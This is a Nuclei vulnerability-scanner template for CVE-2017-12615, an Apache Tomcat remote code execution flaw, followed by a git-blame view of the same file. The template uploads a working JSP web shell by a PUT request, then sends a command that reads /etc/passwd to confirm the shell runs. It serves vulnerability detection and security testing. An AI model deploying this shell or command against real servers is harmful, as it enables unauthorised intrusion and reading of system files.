nuclei-templates/http/cves/2017/CVE-2017-12615.yaml

id: CVE-2017-12615

info:
  name: Apache Tomcat Servers - Remote Code Execution
  author: pikpikcu
  severity: high
  description: |
    Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
    - https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E
    - http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12615
    - http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-12615
    cwe-id: CWE-434
    epss-score: 0.97499
    cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    shodan-query: title:"Apache Tomcat"
    vendor: apache
    product: tomcat
  tags: rce,tomcat,kev,vulhub,cve,cve2017,apache,fileupload,intrusive

http:
  - method: PUT
    path:
      - "{{BaseURL}}/poc.jsp/"

    body: |
      <%@ page import="java.util.*,java.io.*"%>
      <%
      if (request.getParameter("cmd") != null) {
              out.println("Command: " + request.getParameter("cmd") + "<BR>");
              Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
              OutputStream os = p.getOutputStream();
              InputStream in = p.getInputStream();
              DataInputStream dis = new DataInputStream(in);
              String disr = dis.readLine();
              while ( disr != null ) {
                      out.println(disr);
                      disr = dis.readLine();
                      }
              }
      %>

    headers:
      Content-Type: application/x-www-form-urlencoded

  - method: GET
    path:
      - "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00			`id: CVE-2017-12615`

			`info:`
Dashboard Content Enhancements (#4567) Dashboard Content Enhancements 2022-06-09 20:35:21 +00:00			`name: Apache Tomcat Servers - Remote Code Execution`
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00			`author: pikpikcu`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`severity: high`
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00			`description: \|`
Dashboard Content Enhancements (#4567) Dashboard Content Enhancements 2022-06-09 20:35:21 +00:00			`Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://lists.apache.org/thread.html/8fcb1e2d5895413abcf266f011b9918ae03e0b7daceb118ffbf23f8c@%3Cannounce.tomcat.apache.org%3E`
Dead Site Removal (#4641) * Deleted buffalo-config-injection.yaml Add reference from buffalo-config-injection.yaml to CVE-2021-20091.yaml * Delete vulnerabilities/other/buffalo-config-injection.yaml * Link cleanups * Change links to Secunia to point to archive.org * Additonal link cleanup * replace securitytracker.com links with archive.org links 2022-07-01 10:02:07 +00:00			`- http://web.archive.org/web/20211206035549/https://securitytracker.com/id/1039392`
Dashboard Content Enhancements (#4567) Dashboard Content Enhancements 2022-06-09 20:35:21 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2017-12615`
more updates 2023-07-15 16:29:17 +00:00			`- http://breaktoprotect.blogspot.com/2017/09/the-case-of-cve-2017-12615-tomcat-7-put.html`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 8.1`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2017-12615`
			`cwe-id: CWE-434`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`epss-score: 0.97499`
			`cpe: cpe:2.3:a:apache:tomcat:7.0:::::::*`
Update CVE-2017-12615.yaml 2022-07-04 13:05:02 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 2`
Update CVE-2017-12615.yaml 2022-07-04 13:05:02 +00:00			`shodan-query: title:"Apache Tomcat"`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: apache`
			`product: tomcat`
tags update 2023-07-12 11:56:50 +00:00			`tags: rce,tomcat,kev,vulhub,cve,cve2017,apache,fileupload,intrusive`
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00			`- method: PUT`
			`path:`
			`- "{{BaseURL}}/poc.jsp/"`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00			`body: \|`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`<%@ page import="java.util.,java.io."%>`
			`<%`
			`if (request.getParameter("cmd") != null) {`
			`out.println("Command: " + request.getParameter("cmd") + "<BR>");`
			`Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));`
			`OutputStream os = p.getOutputStream();`
			`InputStream in = p.getInputStream();`
			`DataInputStream dis = new DataInputStream(in);`
			`String disr = dis.readLine();`
			`while ( disr != null ) {`
			`out.println(disr);`
			`disr = dis.readLine();`
			`}`
			`}`
			`%>`
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`headers:`
			`Content-Type: application/x-www-form-urlencoded`

Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
Updated "/etc/passwd" regex to avoid possible false positive results. 2022-03-22 08:01:31 +00:00			`- "root:.*:0:0:"`
Apache Tomcat Template improvements (#3446) * Improved Tomcat matchers / extractors / paths * removed duplicate detections / matchers * removed duplicate template * Added missing tomcat tags 2021-12-29 13:40:59 +00:00
Create CVE-2017-12615 (#835) * Create CVE-2017-12615.yaml 2021-02-10 09:44:26 +00:00			`- type: status`
			`status:`
			`- 200`